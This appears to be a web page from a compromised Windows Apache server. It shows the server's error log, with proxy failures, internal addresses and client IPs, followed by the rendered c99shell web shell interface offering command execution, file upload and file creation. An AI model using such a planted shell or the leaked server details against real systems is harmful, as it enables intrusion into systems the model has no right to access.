[Sat Jan 20 14:29:58.193896 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 15:09:57.275310 2024] [cgi:error] [pid 12004:tid 21080] [client 3.9.134.95:53792] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Sat Jan 20 15:46:38.236375 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 15:58:40.205643 2024] [proxy_http:error] [pid 12004:tid 21472] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 186.155.67.105:61299] AH01095: prefetch request body failed to 172.22.1.61:8080 (172.22.1.61) from 186.155.67.105 (), referer: http://190.27.245.106/sipse/faces/autenticacion.xhtml
[Sat Jan 20 16:01:08.000303 2024] [proxy:error] [pid 12004:tid 20812] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 16:01:08.000303 2024] [proxy:error] [pid 12004:tid 20812] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 16:01:08.000303 2024] [proxy_http:error] [pid 12004:tid 20812] [client 66.249.66.165:53009] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 16:15:34.628625 2024] [proxy:error] [pid 12004:tid 20812] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 16:15:34.628625 2024] [proxy:error] [pid 12004:tid 20812] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 16:15:34.628625 2024] [proxy_http:error] [pid 12004:tid 20812] [client 40.77.167.235:45890] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 16:36:04.160385 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 16:36:07.483191 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 16:36:31.600833 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 17:36:33.709560 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 17:41:26.303674 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 18:43:05.085770 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 18:45:26.468818 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 19:26:33.113951 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 19:37:17.161082 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 19:37:21.841090 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 19:38:40.293628 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 19:44:33.259848 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 19:54:01.147645 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 20:05:24.257245 2024] [proxy:error] [pid 12004:tid 21400] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 20:05:24.257245 2024] [proxy:error] [pid 12004:tid 21400] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 20:05:24.257245 2024] [proxy_http:error] [pid 12004:tid 21400] [client 52.167.144.204:6932] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 20:09:11.627645 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 20:27:21.351959 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 21:44:11.128855 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 21:47:45.566832 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 21:47:50.106440 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 22:07:15.054086 2024] [proxy:error] [pid 12004:tid 21004] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 22:07:15.054086 2024] [proxy:error] [pid 12004:tid 21004] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 22:07:15.054086 2024] [proxy_http:error] [pid 12004:tid 21004] [client 211.140.23.130:24295] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 22:38:50.519815 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 22:39:59.986737 2024] [proxy:error] [pid 12004:tid 21028] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 22:39:59.986737 2024] [proxy:error] [pid 12004:tid 21028] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 22:39:59.986737 2024] [proxy_http:error] [pid 12004:tid 21028] [client 66.249.66.166:35289] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 22:59:51.984831 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 23:08:40.856960 2024] [proxy:error] [pid 12004:tid 21360] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 23:08:40.856960 2024] [proxy:error] [pid 12004:tid 21360] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 23:08:40.856960 2024] [proxy_http:error] [pid 12004:tid 21360] [client 52.167.144.198:21275] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 23:11:17.918036 2024] [proxy:error] [pid 12004:tid 21128] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 23:11:17.918036 2024] [proxy:error] [pid 12004:tid 21128] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 23:11:17.918036 2024] [proxy_http:error] [pid 12004:tid 21128] [client 40.77.167.79:52489] AH01114: HTTP: failed to make connection to backend: 192.168.175.18
[Sat Jan 20 23:32:45.045096 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 23:36:00.373039 2024] [mpm_winnt:warn] [pid 12004:tid 21868] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Sat Jan 20 23:54:59.689841 2024] [proxy:error] [pid 12004:tid 21028] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 192.168.175.18:80 (192.168.175.18) failed
[Sat Jan 20 23:54:59.689841 2024] [proxy:error] [pid 12004:tid 21028] AH00959: ap_proxy_connect_backend disabling worker for (192.168.175.18) for 60s
[Sat Jan 20 23:54:59.689841 2024] [proxy_http:error] [pid 12004:tid 21028] [client 66.249.66.165:61097] AH01114: HTTP: failed to make connection to backend: 192.168.175.18

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--